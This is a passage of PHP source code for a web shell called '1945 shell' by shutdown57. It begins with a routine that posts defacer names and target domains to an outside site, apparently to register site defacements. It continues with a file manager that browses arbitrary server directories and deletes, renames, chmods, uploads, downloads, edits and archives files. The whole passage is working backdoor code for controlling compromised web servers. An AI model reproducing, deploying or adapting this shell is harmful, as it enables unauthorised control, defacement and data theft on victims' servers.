1466 curl_setopt($ch, CURLOPT_POSTFIELDS, array(
1467 "defacer" => $hacker,
1468 "domain1" => $target,
1469 "hackmode" => "1",
1470 "reason" => "1",
1471 ));
1472 $res = curl_exec($ch);
1473 curl_close($ch);
1474 return preg_match("/<font color=\"red\">OK<\/font><\/li>/", $res);
1475}
1476if($go) {
1477 foreach($url as $sites) {
1478 if(kirim($sites,$_POST['depecer'])) {
1479 echo "<br>[ OK ] => $sites <br>";
1480 } else {
1481 echo "<br>[ ERROR ] => $sites <br>";
1482 }
1483 }
1484}
1485
1486}elseif($_GET['mobile']){
1487 if(!$_SESSION['responsive']){
1488$_SESSION['responsive']="<meta name='viewport' content='width=device-width,inintial-scale=1'>";
1489}else{
1490echo $_SESSION['responsive'];
1491}
1492}elseif($_GET['mobile_off']){
1493unset($_SESSION['responsive']);
1494echo"<script>
1495alert('mode responsive :OFF');
1496window.location.href='?responsive=off';
1497</script>";
1498
1499}elseif($_GET['theme']){
1500 ?>
1501 <br><br>
1502 <center>
1503 <h1>.:: change theme and become more comfortable ::.</h1>
1504 <small>c0ded by shutdown57</small>
1505
1506 <br><br>
1507 <table class="tbl_exp" border=1><thead id="thead">
1508 <th>FONT SIZE</th><th>FONT COLOR</th><th>PUBLIC FONT COLOR</th><th>BACKGROUND</th><th>REPONSIVE MODE</th></thead>
1509 <tbody>
1510 <tr><td>
1511 <form method="post">
1512 <input type="number" name="fz" value="<?=$fz;?>"><input type="submit" name="submitfz" value=">>"></form></td><td>
1513 <form method="post">
1514<input type="color" name="color" value="<?=$col;?>"><input type="submit" name="submitcol" value=">>"></form></td><td>
1515<form method="post">
1516<input type="color" name="pcolor" value="<?=$pcol;?>"><input type="submit" name="submitpc" value=">>"></form></td><td>
1517<form method="post">
1518<input type="color" name="bgcolor" value="<?=$bg;?>"><input type="text" value="<?=$bg;?>" name="bgcolor"><input type="submit" name="submitbg" value=">>"></form></td><td><?php echo $resmod;?></td></tr></tbody></table>
1519<h3>[<a href='?act=<?=$d;?>&reset=<?=$d;?>'>DEFAULT THEMES</a>]</h3>
1520</center>
1521<pre>
1522
1523FONT SIZE : mengubah ukuran font(tulisan) ,semakin besar angka semakin besar pula ukuran font.
1524FONT COLOR : mengubah warna font (bukan link).
1525PUBLIC FONT COLOR : mengubah semua warna font(termasuk link).
1526BACKGROUND : mengubah warna background atau bisa dengan gambar di isi dengan :
1527 ex : url('http://google.com/gambar.jpg')
1528REPONSIVE MODE : mode saat menyesuaikan ukuran layar pengguna.
1529
1530</pre>
1531<?php
1532}elseif($_GET['reset']){
1533unset($_SESSION['fz']);
1534unset($_SESSION['col']);
1535unset($_SESSION['pcol']);
1536unset($_SESSION['bg']);
1537echo "<script>window.location.href='?'</script>";
1538}elseif (isset($_GET['replace'])) {
1539 echo"
1540 <center>
1541 <h3>: auto replace string :</h3>
1542 <P>NB : gunakan otak kalian ! </p>
1543 <br>
1544 <form method='post'>
1545 <input type='submit' name='sstr' value='replace all'>
1546 <table style='border-collapse:collapse;border:1px solid #eee;' border=1><tr><td>
1547 <textarea name='str' style='width:600px;height:200px;' required>Your string here / string anda sini</textarea></td><td>
1548 <textarea name='str2' style='width:600px;height:200px;' required>string will u replace / string yang ingin anda ganti</textarea></td></tr>
1549 <tr><td>
1550 <textarea name='str3' style='width:600px;height:200px;' required>string replace /ganti string</textarea></td><td>
1551 <form>";
1552 if(isset($_POST['sstr'])){
1553 $rep=str_replace($_POST['str2'],$_POST['str3'],$_POST['str']);
1554 if($rep){
1555 echo'
1556 <textarea style="width:600px;height:200px;">'.$rep.'</textarea></td></tr></table>';
1557 }
1558 }
1559}
1560}else{
1561 ?>
1562<table class="tbl_exp" border='1'>
1563<tr id="thead">
1564<th>No</th><th>^</th><th>Name</th><th>Permission</th><th>Size</th><th>Last Modified</th><th>action</th>
1565</tr>
1566
1567<?php
1568if(isset($_GET['45'])){
1569$d=$_GET['45'];
1570}else{
1571$d=getcwd();
1572}
1573$d=str_replace('\\','/',$d);
1574$sdir=scandir($d);
1575$no=1;
1576echo'
1577<form method="post">
1578<tr class="hover">
1579
1580 <td style="width:25px;max-width:48px;">-</td><td style="width:20px">^</td><td style="width:20%;max-width:500px;">
1581 <--[<a href="?45='.dirname($d).'">..</a>]</td><td>--</td><td>--</td><td>--</td><td>[<a href="?act='.$d.'&upload='.$d.'/'.$dir.'">upload</a>][<a href="?act='.$d.'&mkdir='.$d.'/'.$dir.'">newdir</a>][<a href="?act='.$d.'&newfile='.$d.'/'.$dir.'">newfile</a>]</td></tr>';
1582foreach ($sdir as $dir) {
1583 if(!is_dir("$d/$dir")||$dir=='.'||$dir=='..')continue;
1584 echo'
1585
1586 <tr class="hover">
1587 <td>'.$no++.'</td><td>
1588<input type="checkbox" name="cekd[]" value="'.$d.'/'.$dir.'" style="background:transparent;color: #fff;border: 1px solid #fff;">
1589</td>
1590 <td style="width:20%;max-width:500px;">'.icon_folder.'
1591 [<a href="?45='.$d.'/'.$dir.'">'.substr($dir,0,40).'</a>]</td>
1592 <td>'.perms("$d/$dir").'</td><td>DIR</td><td>'.date('d M Y | H:m',filemtime("$d/$dir")).'</td><td style="width:20%;max-width:400px;">
1593 [<a href="?act='.$d.'&rmdir='.$d.'/'.$dir.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$dir.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$dir.'">chmod</a>]</td></tr>';
1594}
1595foreach ($sdir as $file) {
1596 if(!is_file("$d/$file"))continue;
1597 $size = filesize("$d/$file")/1024;
1598$size = round($size,3);
1599if($size >= 1024){
1600$size = round($size/1024,2).' MB';
1601}else{
1602$size = $size.' KB';
1603}
1604 echo'
1605 <tr class="hover">
1606 <td>'.$no++.'</td><td><input type="checkbox" name="cekf[]" value="'.$d.'/'.$file.'"></td><td style="width:20%;max-width:500px;">'.icon_file.'
1607 -<a href="?act='.$d.'&src='.$d.'/'.$file.'">'.substr($file,0,40).'</a></td>
1608 <td>'.perms("$d/$file").'</td><td>'.$size.'</td><td>'.date('d M Y | H:m',filemtime("$d/$file")).'</td><td style="width:20%;max-width:400px;">
1609 [<a href="?act='.$d.'&edit='.$d.'/'.$file.'">edit</a>][<a href="?act='.$d.'&rm='.$d.'/'.$file.'">delete</a>][<a href="?act='.$d.'&rename='.$d.'/'.$file.'">rename</a>][<a href="?act='.$d.'&chmod='.$d.'/'.$file.'">chmod</a>][<a href="?act='.$d.'&download='.$d.'/'.$file.'">Download</a>]</td></tr>';
1610}
1611
1612echo'
1613<tr>
1614<td colspan="3">
1615<select name="select">
1616<option> action selected files</option>
1617<option value="del">delete</option>
1618<option value="copy">backUp</option>
1619<option value="unzip">unzip</option>
1620<option value="gz">compress .gz</option>
1621<option value="tar"> compress .tar.gz </option>
1622</select>
1623<input type="submit" name="sbmt" value=">>" >
1624</form></td><td><form method="post">
1625font size : <input type="number" name="fz" value="'.$fz.'"><input type="submit" name="submitfz" value=">>"></form></td><td><form method="post">
1626background: <input type="color" name="bgcolor" value="'.$bg.'"><input type="submit" name="submitbg" value=">>"></form></td><td><form method="post">
1627font color: <input type="color" name="color" value="'.$col.'"><input type="submit" name="submitcol" value=">>"></form></td><td>responsive mode : '.$resmod.' </td></tr>
1628</table>';
1629
1630if(isset($_POST['sbmt'])){
1631 $file=$_POST['cekf'];
1632 $dir=$_POST['cekd'];
1633 if($_POST['select']=='del'){
1634 if($_POST['cekf']){
1635
1636 foreach ($file as $cekf) {
1637 if(unlink($cekf)){
1638 echo"<meta http-equiv='refresh' content=0;url=>";
1639 }
1640 }
1641 }
1642 if($_POST['cekd']){
1643
1644 foreach ($dir as $cekd) {
1645 if(rmdir($cekd)){
1646 echo"<meta http-equiv='refresh' content=0;url=>";
1647 }
1648 }}}elseif($_POST['select']=='copy'){
1649if($_POST['cekf']){
1650
1651 foreach ($file as $copy) {
1652 $copi=basename($copy);
1653 if(!file_exists("45backUp")){
1654 @mkdir('45backUp');
1655 }
1656 if(copy($copy,"45backUp/".basename($copy))){
1657 echo"[<font color=lime>OK</font>]--> <a href='?act=".dirname($copy)."/45backUp&src=".dirname($copy)."/45backUp/".basename($copy)."'> ".basename($copy)." </a><br>";
1658 }else{
1659 echo "[<font color=grey>FAIL</font>]--> 45backUp/".basename($Copy)."<br>";
1660 }
1661 }
1662}
1663}elseif ($_POST['select']=='unzip') {
1664 @mkdir("45extracted");
1665 foreach ($file as $unzip) {
1666 $zip = new ZipArchive;
1667$res = $zip->open($unzip);
1668
1669if ($res === TRUE) {
1670
1671$zip->extractTo("45extracted/");
1672
1673$zip->close();
1674 echo "[<font color=lime>OK</font>] extracted !<br>";
1675 } else {
1676
1677echo "[<font color=grey>FAIL</font>] feiled!";
1678 }
1679 }
1680}elseif($_POST['select']=='gz'){
1681 if($_POST['cekf']){
1682 if(!file_exists("45compressed")){
1683 @mkdir("45compressed");
1684 }
1685foreach($file as $gz){
1686$gzfile = "45compressed/".basename($gz).".gz";
1687$fp = gzopen($gzfile, 'w9');
1688if(gzwrite($fp, file_get_contents($gz))){
1689 echo"[<font color=lime> OK </font>] Compressed !!--> <a href='?45=".dirname($gz)."/45compressed'>here</a>";
1690}
1691gzclose($fp);
1692
1693}
1694}
1695}elseif ($_POST['select']=='tar') {
1696 try
1697{
1698 $a = new PharData('45archive.tar');
1699foreach($file as $tar){
1700 $a->addFile($tar);
1701}
1702 $a->compress(Phar::GZ);
1703 @unlink('45archive.tar');
1704}
1705catch (Exception $e)
1706{
1707 echo "Exception : " . $e;
1708}
1709}
1710}
1711}
1712function perms($file){
1713$perms = fileperms($file);
1714
1715if (($perms & 0xC000) == 0xC000) {
1716// Socket
1717$info = 's';
1718} elseif (($perms & 0xA000) == 0xA000) {
1719// Symbolic Link
1720$info = 'l';
1721} elseif (($perms & 0x8000) == 0x8000) {
1722// Regular
1723$info = '-';
1724} elseif (($perms & 0x6000) == 0x6000) {
1725// Block special
1726$info = 'b';
1727} elseif (($perms & 0x4000) == 0x4000) {
1728// Directory
1729$info = 'd';
1730} elseif (($perms & 0x2000) == 0x2000) {
1731// Character special
1732$info = 'c';
1733} elseif (($perms & 0x1000) == 0x1000) {
1734// FIFO pipe
1735$info = 'p';
1736} else {
1737// Unknown
1738$info = 'u';
1739}
1740
1741// Owner
1742$info .= (($perms & 0x0100) ? 'r' : '-');
1743$info .= (($perms & 0x0080) ? 'w' : '-');
1744$info .= (($perms & 0x0040) ?
1745(($perms & 0x0800) ? 's' : 'x' ) :
1746(($perms & 0x0800) ? 'S' : '-'));
1747
1748// Group
1749$info .= (($perms & 0x0020) ? 'r' : '-');
1750$info .= (($perms & 0x0010) ? 'w' : '-');
1751$info .= (($perms & 0x0008) ?
1752(($perms & 0x0400) ? 's' : 'x' ) :
1753(($perms & 0x0400) ? 'S' : '-'));
1754
1755// World
1756$info .= (($perms & 0x0004) ? 'r' : '-');
1757$info .= (($perms & 0x0002) ? 'w' : '-');
1758$info .= (($perms & 0x0001) ?
1759(($perms & 0x0200) ? 't' : 'x' ) :
1760(($perms & 0x0200) ? 'T' : '-'));
1761
1762return $info;
1763}
1764?>
1765<div style="font-size:11px;position:fixed;bottom:0;left:0;">
1766copyright © <?php echo date('Y');?> | 1945 shell by : shutdown57 | <a href="http://www.withoutshadow.org"> www.withoutshadow.org</a>
1767</div>
1768</body>
1769</html>
1770?>